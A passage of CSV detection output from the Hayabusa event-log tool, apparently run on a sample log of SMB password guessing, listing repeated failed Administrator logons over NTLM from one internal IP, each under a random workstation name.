+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.454 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.511 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.718 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.762 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.450 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.568 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.691 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:32.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.240 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.492 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.736 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.811 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.894 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.360 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.447 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.833 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 